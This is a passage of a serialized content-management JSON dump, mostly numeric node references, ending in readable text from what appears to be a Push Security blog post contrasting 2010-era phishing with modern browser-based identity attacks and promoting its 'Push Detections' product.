nodeType":173},{},[],{"data":80281,"content":80282,"nodeType":178},{},[80283],{"data":80284,"marks":80285,"value":60144,"nodeType":173},{},[],{"data":80287,"content":80288,"nodeType":178},{},[80289],{"data":80290,"marks":80291,"value":60151,"nodeType":173},{},[],{"data":80293,"content":80294,"nodeType":178},{},[80295],{"data":80296,"marks":80297,"value":60158,"nodeType":173},{},[],{"data":80299,"content":80300,"nodeType":231},{},[],{"data":80302,"content":80303,"nodeType":169},{},[80304],{"data":80305,"marks":80306,"value":60169,"nodeType":173},{},[80307],{"type":370},{"data":80309,"content":80310,"nodeType":178},{},[80311],{"data":80312,"marks":80313,"value":60176,"nodeType":173},{},[],{"data":80315,"content":80318,"nodeType":312},{"target":80316},{"sys":80317},{"id":27196,"type":317,"linkType":318},[],{"data":80320,"content":80321,"nodeType":178},{},[80322],{"data":80323,"marks":80324,"value":60188,"nodeType":173},{},[],{"data":80326,"content":80327,"nodeType":235},{},[80328],{"data":80329,"marks":80330,"value":60196,"nodeType":173},{},[80331],{"type":370},{"data":80333,"content":80334,"nodeType":178},{},[80335],{"data":80336,"marks":80337,"value":60203,"nodeType":173},{},[],{"data":80339,"content":80340,"nodeType":178},{},[80341],{"data":80342,"marks":80343,"value":60210,"nodeType":173},{},[],{"data":80345,"content":80348,"nodeType":312},{"target":80346},{"sys":80347},{"id":60215,"type":317,"linkType":318},[],{"data":80350,"content":80351,"nodeType":178},{},[80352,80355,80362],{"data":80353,"marks":80354,"value":60223,"nodeType":173},{},[],{"data":80356,"content":80357,"nodeType":186},{"uri":60226},[80358],{"data":80359,"marks":80360,"value":39789,"nodeType":173},{},[80361],{"type":194},{"data":80363,"marks":80364,"value":60235,"nodeType":173},{},[],{"data":80366,"content":80369,"nodeType":312},{"target":80367},{"sys":80368},{"id":60240,"type":317,"linkType":318},[],{"data":80371,"content":80372,"nodeType":178},{},[80373],{"data":80374,"marks":80375,"value":60248,"nodeType":173},{},[],{"data":80377,"content":80378,"nodeType":178},{},[80379],{"data":80380,"marks":80381,"value":21384,"nodeType":173},{},[],{"data":80383,"content":80384,"nodeType":178},{},[80385],{"data":80386,"marks":80387,"value":60261,"nodeType":173},{},[],{"data":80389,"content":80392,"nodeType":312},{"target":80390},{"sys":80391},{"id":60266,"type":317,"linkType":318},[],{"data":80394,"content":80395,"nodeType":231},{},[],{"data":80397,"content":80398,"nodeType":235},{},[80399],{"data":80400,"marks":80401,"value":60278,"nodeType":173},{},[80402],{"type":370},{"data":80404,"content":80405,"nodeType":178},{},[80406,80409,80416],{"data":80407,"marks":80408,"value":21114,"nodeType":173},{},[],{"data":80410,"content":80411,"nodeType":186},{"uri":21119},[80412],{"data":80413,"marks":80414,"value":1845,"nodeType":173},{},[80415],{"type":194},{"data":80417,"marks":80418,"value":197,"nodeType":173},{},[],{"data":80420,"content":80421,"nodeType":178},{},[80422],{"data":80423,"marks":80424,"value":60301,"nodeType":173},{},[],{"data":80426,"content":80427,"nodeType":178},{},[80428,80431,80438,80441,80448],{"data":80429,"marks":80430,"value":60308,"nodeType":173},{},[],{"data":80432,"content":80433,"nodeType":186},{"uri":21280},[80434],{"data":80435,"marks":80436,"value":21283,"nodeType":173},{},[80437],{"type":194},{"data":80439,"marks":80440,"value":60319,"nodeType":173},{},[],{"data":80442,"content":80443,"nodeType":186},{"uri":60322},[80444],{"data":80445,"marks":80446,"value":60328,"nodeType":173},{},[80447],{"type":194},{"data":80449,"marks":80450,"value":1477,"nodeType":173},{},[],{"data":80452,"content":80453,"nodeType":178},{},[80454],{"data":80455,"marks":80456,"value":60338,"nodeType":173},{},[],{"data":80458,"content":80459,"nodeType":178},{},[80460],{"data":80461,"marks":80462,"value":60345,"nodeType":173},{},[],{"data":80464,"content":80467,"nodeType":312},{"target":80465},{"sys":80466},{"id":60350,"type":317,"linkType":318},[],{"data":80469,"content":80470,"nodeType":178},{},[80471],{"data":80472,"marks":80473,"value":60358,"nodeType":173},{},[],{"data":80475,"content":80476,"nodeType":178},{},[80477],{"data":80478,"marks":80479,"value":60365,"nodeType":173},{},[],{"data":80481,"content":80482,"nodeType":178},{},[80483],{"data":80484,"marks":80485,"value":60372,"nodeType":173},{},[],{"data":80487,"content":80488,"nodeType":231},{},[],{"data":80490,"content":80491,"nodeType":235},{},[80492],{"data":80493,"marks":80494,"value":60383,"nodeType":173},{},[80495],{"type":370},{"data":80497,"content":80498,"nodeType":178},{},[80499,80502,80508],{"data":80500,"marks":80501,"value":60390,"nodeType":173},{},[],{"data":80503,"content":80504,"nodeType":186},{"uri":19838},[80505],{"data":80506,"marks":80507,"value":8091,"nodeType":173},{},[],{"data":80509,"marks":80510,"value":2340,"nodeType":173},{},[],{"data":80512,"content":80515,"nodeType":312},{"target":80513},{"sys":80514},{"id":60404,"type":317,"linkType":318},[],{"data":80517,"content":80518,"nodeType":178},{},[80519],{"data":80520,"marks":80521,"value":60412,"nodeType":173},{},[],{"data":80523,"content":80524,"nodeType":178},{},[80525],{"data":80526,"marks":80527,"value":60419,"nodeType":173},{},[],{"data":80529,"content":80532,"nodeType":312},{"target":80530},{"sys":80531},{"id":60424,"type":317,"linkType":318},[],{"data":80534,"content":80535,"nodeType":178},{},[80536],{"data":80537,"marks":80538,"value":60432,"nodeType":173},{},[],{"data":80540,"content":80541,"nodeType":178},{},[80542],{"data":80543,"marks":80544,"value":60439,"nodeType":173},{},[],{"data":80546,"content":80547,"nodeType":231},{},[],{"data":80549,"content":80550,"nodeType":235},{},[80551],{"data":80552,"marks":80553,"value":60450,"nodeType":173},{},[80554],{"type":370},{"data":80556,"content":80557,"nodeType":178},{},[80558],{"data":80559,"marks":80560,"value":60457,"nodeType":173},{},[],{"data":80562,"content":80563,"nodeType":178},{},[80564,80567,80574],{"data":80565,"marks":80566,"value":60464,"nodeType":173},{},[],{"data":80568,"content":80569,"nodeType":186},{"uri":60467},[80570],{"data":80571,"marks":80572,"value":60473,"nodeType":173},{},[80573],{"type":194},{"data":80575,"marks":80576,"value":60477,"nodeType":173},{},[],{"data":80578,"content":80579,"nodeType":178},{},[80580,80583,80590,80593,80600,80603,80610],{"data":80581,"marks":80582,"value":60484,"nodeType":173},{},[],{"data":80584,"content":80585,"nodeType":186},{"uri":60487},[80586],{"data":80587,"marks":80588,"value":60493,"nodeType":173},{},[80589],{"type":194},{"data":80591,"marks":80592,"value":60497,"nodeType":173},{},[],{"data":80594,"content":80595,"nodeType":186},{"uri":60500},[80596],{"data":80597,"marks":80598,"value":60506,"nodeType":173},{},[80599],{"type":194},{"data":80601,"marks":80602,"value":9534,"nodeType":173},{},[],{"data":80604,"content":80605,"nodeType":186},{"uri":60512},[80606],{"data":80607,"marks":80608,"value":60518,"nodeType":173},{},[80609],{"type":194},{"data":80611,"marks":80612,"value":1477,"nodeType":173},{},[],{"data":80614,"content":80615,"nodeType":178},{},[80616],{"data":80617,"marks":80618,"value":60528,"nodeType":173},{},[],{"data":80620,"content":80621,"nodeType":178},{},[80622],{"data":80623,"marks":80624,"value":60535,"nodeType":173},{},[],{"data":80626,"content":80627,"nodeType":178},{},[80628],{"data":80629,"marks":80630,"value":60542,"nodeType":173},{},[],{"data":80632,"content":80633,"nodeType":231},{},[],{"data":80635,"content":80636,"nodeType":235},{},[80637],{"data":80638,"marks":80639,"value":60553,"nodeType":173},{},[80640],{"type":370},{"data":80642,"content":80643,"nodeType":178},{},[80644],{"data":80645,"marks":80646,"value":60560,"nodeType":173},{},[],{"data":80648,"content":80649,"nodeType":178},{},[80650],{"data":80651,"marks":80652,"value":60567,"nodeType":173},{},[],{"data":80654,"content":80655,"nodeType":178},{},[80656],{"data":80657,"marks":80658,"value":60574,"nodeType":173},{},[],{"data":80660,"content":80661,"nodeType":231},{},[],{"data":80663,"content":80664,"nodeType":235},{},[80665],{"data":80666,"marks":80667,"value":60585,"nodeType":173},{},[80668],{"type":370},{"data":80670,"content":80671,"nodeType":178},{},[80672],{"data":80673,"marks":80674,"value":60592,"nodeType":173},{},[],{"data":80676,"content":80677,"nodeType":178},{},[80678,80681,80688,80691,80698],{"data":80679,"marks":80680,"value":60599,"nodeType":173},{},[],{"data":80682,"content":80683,"nodeType":186},{"uri":60115},[80684],{"data":80685,"marks":80686,"value":27706,"nodeType":173},{},[80687],{"type":194},{"data":80689,"marks":80690,"value":60610,"nodeType":173},{},[],{"data":80692,"content":80693,"nodeType":186},{"uri":60613},[80694],{"data":80695,"marks":80696,"value":27729,"nodeType":173},{},[80697],{"type":194},{"data":80699,"marks":80700,"value":60622,"nodeType":173},{},[],{"data":80702,"content":80703,"nodeType":178},{},[80704,80707,80714],{"data":80705,"marks":80706,"value":60629,"nodeType":173},{},[],{"data":80708,"content":80709,"nodeType":186},{"uri":60632},[80710],{"data":80711,"marks":80712,"value":60638,"nodeType":173},{},[80713],{"type":194},{"data":80715,"marks":80716,"value":60642,"nodeType":173},{},[],{"data":80718,"content":80719,"nodeType":178},{},[80720],{"data":80721,"marks":80722,"value":60649,"nodeType":173},{},[],{"data":80724,"content":80725,"nodeType":231},{},[],{"data":80727,"content":80728,"nodeType":169},{},[80729],{"data":80730,"marks":80731,"value":40632,"nodeType":173},{},[80732],{"type":370},{"data":80734,"content":80735,"nodeType":178},{},[80736],{"data":80737,"marks":80738,"value":60666,"nodeType":173},{},[],{"data":80740,"content":80741,"nodeType":178},{},[80742],{"data":80743,"marks":80744,"value":27202,"nodeType":173},{},[],{"data":80746,"content":80747,"nodeType":178},{},[80748,80751,80758],{"data":80749,"marks":80750,"value":59468,"nodeType":173},{},[],{"data":80752,"content":80753,"nodeType":186},{"uri":60681},[80754],{"data":80755,"marks":80756,"value":1472,"nodeType":173},{},[80757],{"type":194},{"data":80759,"marks":80760,"value":1477,"nodeType":173},{},[],{"items":80762},[80763,80765],{"sys":80764,"name":505},{"id":504},{"sys":80766,"name":509},{"id":508},{"items":80768},[80769],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":80770},{"url":1496},{"__typename":1528,"sys":80772,"content":80773,"title":70368,"synopsis":70369,"hashTags":118,"publishedDate":70370,"slug":70371,"tagsCollection":81283,"authorsCollection":81289},{"id":69777},{"json":80774},{"data":80775,"content":80776,"nodeType":165},{},[80777,80783,80789,80805,80811,80827,80833,80836,80843,80849,80855,80860,80866,80906,80942,80949,80955,80971,81001,81006,81012,81017,81023,81030,81056,81061,81064,81071,81087,81103,81129,81134,81137,81144,81150,81230,81233,81240,81255,81261,81267],{"data":80778,"content":80779,"nodeType":178},{},[80780],{"data":80781,"marks":80782,"value":69788,"nodeType":173},{},[],{"data":80784,"content":80785,"nodeType":178},{},[80786],{"data":80787,"marks":80788,"value":69795,"nodeType":173},{},[],{"data":80790,"content":80791,"nodeType":178},{},[80792,80795,80802],{"data":80793,"marks":80794,"value":69802,"nodeType":173},{},[],{"data":80796,"content":80797,"nodeType":186},{"uri":69805},[80798],{"data":80799,"marks":80800,"value":69811,"nodeType":173},{},[80801],{"type":194},{"data":80803,"marks":80804,"value":69815,"nodeType":173},{},[],{"data":80806,"content":80807,"nodeType":178},{},[80808],{"data":80809,"marks":80810,"value":69822,"nodeType":173},{},[],{"data":80812,"content":80813,"nodeType":178},{},[80814,80817,80824],{"data":80815,"marks":80816,"value":69829,"nodeType":173},{},[],{"data":80818,"content":80819,"nodeType":186},{"uri":59420},[80820],{"data":80821,"marks":80822,"value":69837,"nodeType":173},{},[80823],{"type":194},{"data":80825,"marks":80826,"value":69841,"nodeType":173},{},[],{"data":80828,"content":80829,"nodeType":178},{},[80830],{"data":80831,"marks":80832,"value":69848,"nodeType":173},{},[],{"data":80834,"content":80835,"nodeType":231},{},[],{"data":80837,"content":80838,"nodeType":169},{},[80839],{"data":80840,"marks":80841,"value":69859,"nodeType":173},{},[80842],{"type":370},{"data":80844,"content":80845,"nodeType":178},{},[80846],{"data":80847,"marks":80848,"value":69866,"nodeType":173},{},[],{"data":80850,"content":80851,"nodeType":178},{},[80852],{"data":80853,"marks":80854,"value":69873,"nodeType":173},{},[],{"data":80856,"content":80859,"nodeType":312},{"target":80857},{"sys":80858},{"id":69878,"type":317,"linkType":318},[],{"data":80861,"content":80862,"nodeType":178},{},[80863],{"data":80864,"marks":80865,"value":69886,"nodeType":173},{},[],{"data":80867,"content":80868,"nodeType":250},{},[80869,80878,80897],{"data":80870,"content":80871,"nodeType":254},{},[80872],{"data":80873,"content":80874,"nodeType":178},{},[80875],{"data":80876,"marks":80877,"value":69899,"nodeType":173},{},[],{"data":80879,"content":80880,"nodeType":254},{},[80881],{"data":80882,"content":80883,"nodeType":178},{},[80884,80887,80894],{"data":80885,"marks":80886,"value":69909,"nodeType":173},{},[],{"data":80888,"content":80889,"nodeType":186},{"uri":69912},[80890],{"data":80891,"marks":80892,"value":8046,"nodeType":173},{},[80893],{"type":194},{"data":80895,"marks":80896,"value":69921,"nodeType":173},{},[],{"data":80898,"content":80899,"nodeType":254},{},[80900],{"data":80901,"content":80902,"nodeType":178},{},[80903],{"data":80904,"marks":80905,"value":69931,"nodeType":173},{},[],{"data":80907,"content":80908,"nodeType":178},{},[80909,80912,80919,80922,80929,80932,80939],{"data":80910,"marks":80911,"value":69938,"nodeType":173},{},[],{"data":80913,"content":80914,"nodeType":186},{"uri":69941},[80915],{"data":80916,"marks":80917,"value":69947,"nodeType":173},{},[80918],{"type":194},{"data":80920,"marks":80921,"value":69951,"nodeType":173},{},[],{"data":80923,"content":80924,"nodeType":186},{"uri":69941},[80925],{"data":80926,"marks":80927,"value":69947,"nodeType":173},{},[80928],{"type":194},{"data":80930,"marks":80931,"value":69962,"nodeType":173},{},[],{"data":80933,"content":80934,"nodeType":186},{"uri":69941},[80935],{"data":80936,"marks":80937,"value":69947,"nodeType":173},{},[80938],{"type":194},{"data":80940,"marks":80941,"value":69973,"nodeType":173},{},[],{"data":80943,"content":80944,"nodeType":235},{},[80945],{"data":80946,"marks":80947,"value":69981,"nodeType":173},{},[80948],{"type":370},{"data":80950,"content":80951,"nodeType":178},{},[80952],{"data":80953,"marks":80954,"value":69988,"nodeType":173},{},[],{"data":80956,"content":80957,"nodeType":178},{},[80958,80961,80968],{"data":80959,"marks":80960,"value":69995,"nodeType":173},{},[],{"data":80962,"content":80963,"nodeType":186},{"uri":69998},[80964],{"data":80965,"marks":80966,"value":70004,"nodeType":173},{},[80967],{"type":194},{"data":80969,"marks":80970,"value":70008,"nodeType":173},{},[],{"data":80972,"content":80973,"nodeType":178},{},[80974,80977,80984,80987,80994,80997],{"data":80975,"marks":80976,"value":70015,"nodeType":173},{},[],{"data":80978,"content":80979,"nodeType":186},{"uri":63250},[80980],{"data":80981,"marks":80982,"value":63256,"nodeType":173},{},[80983],{"type":194},{"data":80985,"marks":80986,"value":70026,"nodeType":173},{},[],{"data":80988,"content":80989,"nodeType":186},{"uri":70029},[80990],{"data":80991,"marks":80992,"value":70035,"nodeType":173},{},[80993],{"type":194},{"data":80995,"marks":80996,"value":70039,"nodeType":173},{},[],{"data":80998,"marks":80999,"value":70044,"nodeType":173},{},[81000],{"type":370},{"data":81002,"content":81005,"nodeType":312},{"target":81003},{"sys":81004},{"id":70049,"type":317,"linkType":318},[],{"data":81007,"content":81008,"nodeType":178},{},[81009],{"data":81010,"marks":81011,"value":70057,"nodeType":173},{},[],{"data":81013,"content":81016,"nodeType":312},{"target":81014},{"sys":81015},{"id":70062,"type":317,"linkType":318},[],{"data":81018,"content":81019,"nodeType":178},{},[81020],{"data":81021,"marks":81022,"value":70070,"nodeType":173},{},[],{"data":81024,"content":81025,"nodeType":235},{},[81026],{"data":81027,"marks":81028,"value":70078,"nodeType":173},{},[81029],{"type":370},{"data":81031,"content":81032,"nodeType":178},{},[81033,81036,81043,81046,81053],{"data":81034,"marks":81035,"value":70085,"nodeType":173},{},[],{"data":81037,"content":81038,"nodeType":186},{"uri":70088},[81039],{"data":81040,"marks":81041,"value":7856,"nodeType":173},{},[81042],{"type":194},{"data":81044,"marks":81045,"value":70097,"nodeType":173},{},[],{"data":81047,"content":81048,"nodeType":186},{"uri":69941},[81049],{"data":81050,"marks":81051,"value":69947,"nodeType":173},{},[81052],{"type":194},{"data":81054,"marks":81055,"value":70108,"nodeType":173},{},[],{"data":81057,"content":81060,"nodeType":312},{"target":81058},{"sys":81059},{"id":70113,"type":317,"linkType":318},[],{"data":81062,"content":81063,"nodeType":231},{},[],{"data":81065,"content":81066,"nodeType":169},{},[81067],{"data":81068,"marks":81069,"value":8221,"nodeType":173},{},[81070],{"type":370},{"data":81072,"content":81073,"nodeType":178},{},[81074,81077,81084],{"data":81075,"marks":81076,"value":70131,"nodeType":173},{},[],{"data":81078,"content":81079,"nodeType":186},{"uri":70134},[81080],{"data":81081,"marks":81082,"value":70140,"nodeType":173},{},[81083],{"type":194},{"data":81085,"marks":81086,"value":70144,"nodeType":173},{},[],{"data":81088,"content":81089,"nodeType":178},{},[81090,81093,81100],{"data":81091,"marks":81092,"value":70151,"nodeType":173},{},[],{"data":81094,"content":81095,"nodeType":186},{"uri":70154},[81096],{"data":81097,"marks":81098,"value":70160,"nodeType":173},{},[81099],{"type":194},{"data":81101,"marks":81102,"value":70164,"nodeType":173},{},[],{"data":81104,"content":81105,"nodeType":178},{},[81106,81109,81116,81119,81126],{"data":81107,"marks":81108,"value":70171,"nodeType":173},{},[],{"data":81110,"content":81111,"nodeType":186},{"uri":69912},[81112],{"data":81113,"marks":81114,"value":8046,"nodeType":173},{},[81115],{"type":194},{"data":81117,"marks":81118,"value":70182,"nodeType":173},{},[],{"data":81120,"content":81121,"nodeType":186},{"uri":14287},[81122],{"data":81123,"marks":81124,"value":70190,"nodeType":173},{},[81125],{"type":194},{"data":81127,"marks":81128,"value":70194,"nodeType":173},{},[],{"data":81130,"content":81133,"nodeType":312},{"target":81131},{"sys":81132},{"id":8590,"type":317,"linkType":318},[],{"data":81135,"content":81136,"nodeType":231},{},[],{"data":81138,"content":81139,"nodeType":169},{},[81140],{"data":81141,"marks":81142,"value":70210,"nodeType":173},{},[81143],{"type":370},{"data":81145,"content":81146,"nodeType":178},{},[81147],{"data":81148,"marks":81149,"value":70217,"nodeType":173},{},[],{"data":81151,"content":81152,"nodeType":250},{},[81153,81162,81181],{"data":81154,"content":81155,"nodeType":254},{},[81156],{"data":81157,"content":81158,"nodeType":178},{},[81159],{"data":81160,"marks":81161,"value":70230,"nodeType":173},{},[],{"data":81163,"content":81164,"nodeType":254},{},[81165],{"data":81166,"content":81167,"nodeType":178},{},[81168,81171,81178],{"data":81169,"marks":81170,"value":70240,"nodeType":173},{},[],{"data":81172,"content":81173,"nodeType":186},{"uri":69941},[81174],{"data":81175,"marks":81176,"value":69947,"nodeType":173},{},[81177],{"type":194},{"data":81179,"marks":81180,"value":70251,"nodeType":173},{},[],{"data":81182,"content":81183,"nodeType":254},{},[81184],{"data":81185,"content":81186,"nodeType":178},{},[81187,81190,81197,81200,81207,81210,81217,81220,81227],{"data":81188,"marks":81189,"value":70261,"nodeType":173},{},[],{"data":81191,"content":81192,"nodeType":186},{"uri":70264},[81193],{"data":81194,"marks":81195,"value":70270,"nodeType":173},{},[81196],{"type":194},{"data":81198,"marks":81199,"value":2936,"nodeType":173},{},[],{"data":81201,"content":81202,"nodeType":186},{"uri":70276},[81203],{"data":81204,"marks":81205,"value":70282,"nodeType":173},{},[81206],{"type":194},{"data":81208,"marks":81209,"value":2936,"nodeType":173},{},[],{"data":81211,"content":81212,"nodeType":186},{"uri":70288},[81213],{"data":81214,"marks":81215,"value":70294,"nodeType":173},{},[81216],{"type":194},{"data":81218,"marks":81219,"value":3949,"nodeType":173},{},[],{"data":81221,"content":81222,"nodeType":186},{"uri":70300},[81223],{"data":81224,"marks":81225,"value":70306,"nodeType":173},{},[81226],{"type":194},{"data":81228,"marks":81229,"value":70310,"nodeType":173},{},[],{"data":81231,"content":81232,"nodeType":231},{},[],{"data":81234,"content":81235,"nodeType":169},{},[81236],{"data":81237,"marks":81238,"value":2824,"nodeType":173},{},[81239],{"type":370},{"data":81241,"content":81242,"nodeType":178},{},[81243,81246,81252],{"data":81244,"marks":81245,"value":70327,"nodeType":173},{},[],{"data":81247,"content":81248,"nodeType":186},{"uri":6820},[81249],{"data":81250,"marks":81251,"value":8545,"nodeType":173},{},[],{"data":81253,"marks":81254,"value":59454,"nodeType":173},{},[],{"data":81256,"content":81257,"nodeType":178},{},[81258],{"data":81259,"marks":81260,"value":70343,"nodeType":173},{},[],{"data":81262,"content":81263,"nodeType":178},{},[81264],{"data":81265,"marks":81266,"value":70350,"nodeType":173},{},[],{"data":81268,"content":81269,"nodeType":178},{},[81270,81273,81280],{"data":81271,"marks":81272,"value":61741,"nodeType":173},{},[],{"data":81274,"content":81275,"nodeType":186},{"uri":473},[81276],{"data":81277,"marks":81278,"value":70364,"nodeType":173},{},[81279],{"type":194},{"data":81281,"marks":81282,"value":37,"nodeType":173},{},[],{"items":81284},[81285,81287],{"sys":81286,"name":509},{"id":508},{"sys":81288,"name":505},{"id":504},{"items":81290},[81291],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":81292},{"url":8615},{"__typename":1528,"sys":81294,"content":81295,"title":46296,"synopsis":82273,"hashTags":118,"publishedDate":82274,"slug":46297,"tagsCollection":82275,"authorsCollection":82281},{"id":24428},{"json":81296},{"nodeType":165,"data":81297,"content":81298},{},[81299,81306,81318,81330,81342,81354,81360,81379,81386,81401,81408,81414,81417,81425,81432,81439,81446,81452,81455,81463,81470,81489,81496,81503,81510,81517,81523,81530,81537,81544,81573,81580,81598,81605,81612,81632,81652,81671,81677,81684,81700,81707,81714,81721,81740,81748,81755,81762,81765,81773,81780,81787,81794,81837,81843,81850,81865,81954,81960,81967,81974,82037,82044,82051,82058,82064,82071,82078,82085,82091,82098,82105,82112,82118,82137,82144,82151,82194,82200,82203,82211,82235,82238,82245,82251,82257],{"nodeType":178,"data":81300,"content":81301},{},[81302],{"nodeType":173,"value":81303,"marks":81304,"data":81305},"Oh, look! A time capsule from 2010. Wonder what’s inside … ",[],{},{"nodeType":178,"data":81307,"content":81308},{},[81309,81314],{"nodeType":173,"value":81310,"marks":81311,"data":81313},"Listening to:",[81312],{"type":370},{},{"nodeType":173,"value":81315,"marks":81316,"data":81317}," “Like a G6” by Far East Movement (on a Nokia C7 — hey, it even had a touchscreen).",[],{},{"nodeType":178,"data":81319,"content":81320},{},[81321,81326],{"nodeType":173,"value":81322,"marks":81323,"data":81325},"Major news event:",[81324],{"type":370},{},{"nodeType":173,"value":81327,"marks":81328,"data":81329}," Eyjafjallajökull volcano erupts in Iceland, disrupting air travel.",[],{},{"nodeType":178,"data":81331,"content":81332},{},[81333,81338],{"nodeType":173,"value":81334,"marks":81335,"data":81337},"Worried about:",[81336],{"type":370},{},{"nodeType":173,"value":81339,"marks":81340,"data":81341}," Exploitable Flash browser plugins and static HTML phishing sites.",[],{},{"nodeType":178,"data":81343,"content":81344},{},[81345,81350],{"nodeType":173,"value":81346,"marks":81347,"data":81349},"How to be a hero?",[81348],{"type":370},{},{"nodeType":173,"value":81351,"marks":81352,"data":81353}," Roll out the latest AV, implement a web proxy, and add a “report phishing” button to your email solution.",[],{},{"nodeType":312,"data":81355,"content":81359},{"target":81356},{"sys":81357},{"id":81358,"type":317,"linkType":318},"54xYbMs0ii96xb2jgQVX9m",[],{"nodeType":178,"data":81361,"content":81362},{},[81363,81367,81375],{"nodeType":173,"value":81364,"marks":81365,"data":81366},"We’re halfway through 2025, and the time capsule for this year may need to be an XL when it comes to ",[],{},{"nodeType":186,"data":81368,"content":81369},{"uri":63182},[81370],{"nodeType":173,"value":81371,"marks":81372,"data":81374},"how much has happened",[81373],{"type":194},{},{"nodeType":173,"value":81376,"marks":81377,"data":81378}," in the world of browser-based attacks. (Yet fittingly, Drake’s “Nokia” is a pop hit.)",[],{},{"nodeType":178,"data":81380,"content":81381},{},[81382],{"nodeType":173,"value":81383,"marks":81384,"data":81385},"While at least we don’t have to worry about Flash anymore, the browser is now the new battleground, and workforce identities are the most common target. Security teams are struggling with approaches and tools that attackers have outpaced.",[],{},{"nodeType":178,"data":81387,"content":81388},{},[81389,81393,81397],{"nodeType":173,"value":81390,"marks":81391,"data":81392},"In this article, we’ll cover how browser-based attacks have evolved, and how Push is taking a new approach with the release of our ",[],{},{"nodeType":173,"value":19231,"marks":81394,"data":81396},[81395],{"type":370},{},{"nodeType":173,"value":81398,"marks":81399,"data":81400}," capabilities, now generally available to all customers.",[],{},{"nodeType":178,"data":81402,"content":81403},{},[81404],{"nodeType":173,"value":81405,"marks":81406,"data":81407},"Push Detections use real-time telemetry to help you understand context, user behavior, and attacker techniques, and then respond — a modern tool for modern browser-based attacks.",[],{},{"nodeType":312,"data":81409,"content":81413},{"target":81410},{"sys":81411},{"id":81412,"type":317,"linkType":318},"2ULDSj85bXtT2OgpXKBHtB",[],{"nodeType":231,"data":81415,"content":81416},{},[],{"nodeType":169,"data":81418,"content":81419},{},[81420],{"nodeType":173,"value":81421,"marks":81422,"data":81424},"The old world vs. the new world",[81423],{"type":370},{},{"nodeType":178,"data":81426,"content":81427},{},[81428],{"nodeType":173,"value":81429,"marks":81430,"data":81431},"In the early 2010s, the typical attack path involved sending a user an email with a link to a static HTML webpage (most commonly a generic Exchange Web Access clone) that tricked them into giving you Active Directory creds. These could be used to log in to an exposed remote desktop service or the victim’s mailbox, giving the attacker a foothold to install malware. Anyone who’s done “red teaming 101” will recognize this scenario. ",[],{},{"nodeType":178,"data":81433,"content":81434},{},[81435],{"nodeType":173,"value":81436,"marks":81437,"data":81438},"A compromised identity was once just part of a system compromise. That meant the scope of detection and response was focused on the organization’s Active Directory domain, correlated with endpoint and network logs. ",[],{},{"nodeType":178,"data":81440,"content":81441},{},[81442],{"nodeType":173,"value":81443,"marks":81444,"data":81445},"But now, identity attacks happen beyond traditional on-premises networks, impacting cloud identities that are created, used, and attacked in the browser. What was once the familiar backbone of business IT — internal apps and thick clients — has been replaced with a sprawling cloud and SaaS ecosystem that can be targeted directly via identity, without touching the endpoint. ",[],{},{"nodeType":312,"data":81447,"content":81451},{"target":81448},{"sys":81449},{"id":81450,"type":317,"linkType":318},"2F2p4eTMCHo3LfNQJZeGWB",[],{"nodeType":231,"data":81453,"content":81454},{},[],{"nodeType":169,"data":81456,"content":81457},{},[81458],{"nodeType":173,"value":81459,"marks":81460,"data":81462},"Why detection and response hasn’t kept up with threat evolution",[81461],{"type":370},{},{"nodeType":178,"data":81464,"content":81465},{},[81466],{"nodeType":173,"value":81467,"marks":81468,"data":81469},"This shift in attacker TTPs is forcing a change in how we handle detection and response. ",[],{},{"nodeType":178,"data":81471,"content":81472},{},[81473,81477,81485],{"nodeType":173,"value":81474,"marks":81475,"data":81476},"But a lot of organizations are still applying the same old playbooks to this new world where identity attacks are the ",[],{},{"nodeType":186,"data":81478,"content":81479},{"uri":77262},[81480],{"nodeType":173,"value":81481,"marks":81482,"data":81484},"leading cause of breaches",[81483],{"type":194},{},{"nodeType":173,"value":81486,"marks":81487,"data":81488},", with uneven outcomes. ",[],{},{"nodeType":178,"data":81490,"content":81491},{},[81492],{"nodeType":173,"value":81493,"marks":81494,"data":81495},"This isn’t because of a lack of effort or skill on the part of security teams. It’s a reflection of the tools that have been available. ",[],{},{"nodeType":178,"data":81497,"content":81498},{},[81499],{"nodeType":173,"value":81500,"marks":81501,"data":81502},"Let’s look at some of the ways detection and response hasn’t kept up with the evolution of browser-borne threats in this new landscape.",[],{},{"nodeType":235,"data":81504,"content":81505},{},[81506],{"nodeType":173,"value":81507,"marks":81508,"data":81509},"Incomplete identity visibility ",[],{},{"nodeType":178,"data":81511,"content":81512},{},[81513],{"nodeType":173,"value":81514,"marks":81515,"data":81516},"Today’s cloud identity providers see a fraction of the overall logins your users make to online apps, compared to the comprehensive visibility of Active Directory in the old world. You don’t know where users are logging in, how they’re logging in, or whether these logins are securely using phishing-resistant methods.",[],{},{"nodeType":312,"data":81518,"content":81522},{"target":81519},{"sys":81520},{"id":81521,"type":317,"linkType":318},"1SUYueQct7dtWwLh3AaAtA",[],{"nodeType":178,"data":81524,"content":81525},{},[81526],{"nodeType":173,"value":81527,"marks":81528,"data":81529},"This means that identity attacks are routinely bypassing preventative, account hygiene-based controls, putting the strain on detection and response. ",[],{},{"nodeType":235,"data":81531,"content":81532},{},[81533],{"nodeType":173,"value":81534,"marks":81535,"data":81536},"Limited detection coverage ",[],{},{"nodeType":178,"data":81538,"content":81539},{},[81540],{"nodeType":173,"value":81541,"marks":81542,"data":81543},"Email and network security tools got pretty good at intercepting old-school phishing attacks like the ones from our proverbial time capsule: static HTML pages delivered over email that could be intercepted and analyzed when entering the mailbox or being loaded by the user. ",[],{},{"nodeType":178,"data":81545,"content":81546},{},[81547,81551,81561,81565,81569],{"nodeType":173,"value":81548,"marks":81549,"data":81550},"But with modern phishing attacks dynamically obfuscating the code that loads the web page, implementing custom bot protection, and using runtime anti-analysis features, they’re ",[],{},{"nodeType":186,"data":81552,"content":81554},{"uri":81553},"https://pushsecurity.com/blog/why-most-phishing-attacks-feel-like-a-zero-day/",[81555],{"nodeType":173,"value":81556,"marks":81557,"data":81560},"increasingly difficult to detect",[81558,81559],{"type":194},{"type":370},{},{"nodeType":173,"value":3107,"marks":81562,"data":81564},[81563],{"type":370},{},{"nodeType":173,"value":81566,"marks":81567,"data":81568},"using conventional tools",[],{},{"nodeType":173,"value":73803,"marks":81570,"data":81572},[81571],{"type":370},{},{"nodeType":178,"data":81574,"content":81575},{},[81576],{"nodeType":173,"value":81577,"marks":81578,"data":81579},"Of course, email-based detections aren’t much use if attackers are using legitimate services to camouflage their links, or bypassing email altogether by switching to alternative delivery channels like messaging apps (such as Slack and Teams), as well as public services like LinkedIn and Reddit. 